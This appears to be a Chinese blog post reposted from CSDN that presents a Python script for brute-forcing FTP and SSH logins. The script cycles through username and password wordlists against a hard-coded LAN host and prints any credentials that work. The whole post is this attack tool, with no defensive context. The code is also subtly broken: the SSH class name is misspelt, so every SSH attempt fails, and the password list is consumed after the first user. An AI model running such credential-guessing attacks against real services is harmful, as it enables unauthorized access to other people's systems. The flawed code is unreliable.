Python编写暴力破解身份认证服务——SSH/FTP

Python源码:

import ftplib
from pexpect import pxssh


class brute_ftp(object):

    def login_ftp(self, host, username, password):
        try:
            ftp = ftplib.FTP(host)
            ftp.connect(host, 21, timeout=20)
            ftp.login(username, password)
            ftp.retrlines('LIST')
            ftp.quit()
            print("username:%s and password:%s" % (username, password))
        except ftplib.all_errors:
            print(ftplib.all_errors)

    def attack_ftp(self):
        host = "192.168.1.106"
        userdic = "C:\\Users\\28177\\Desktop\\pennetration test\\Brute-Shark\\userdic.txt"
        passdic = "C:\\Users\\28177\\Desktop\\pennetration test\\Brute-Shark\\passdic.txt"
        userfile = open(userdic, "r")
        passfile = open(passdic, "r")
        for user in userfile.readlines():
            for passwd in passfile.readlines():
                un = user.strip('\n')
                pw = passwd.strip('\n')
                self.login_ftp(host, un, pw)


class brute_ssh(object):

    def login_ssh(self, host, username, password):
        try:
            ssh = pxssh.pxsss()
            ssh.login(host, username,password)
            print("username:%s and password:%s" % (username, password))
        except:
            print("Error connecting")

    def attack_ssh(self):
        host = "192.168.1.106"
        userdic = "C:\\Users\\28177\\Desktop\\pennetration test\\Brute-Shark\\userdic.txt"
        passdic = "C:\\Users\\28177\\Desktop\\pennetration test\\Brute-Shark\\passdic.txt"
        userfile = open(userdic, "r")
        passfile = open(passdic, "r")
        for user in userfile.readlines():
            for passwd in passfile.readlines():
                un = user.strip('\n')
                pw = passwd.strip('\n')
                self.login_ssh(host, un, pw)


new_ftp = brute_ftp()
brute_ftp.attack_ftp(new_ftp)
new_ssh = brute_ssh()
brute_ssh.attack_ssh(new_ssh)

猜你喜欢

转载自blog.csdn.net/qq_19623861/article/details/118555076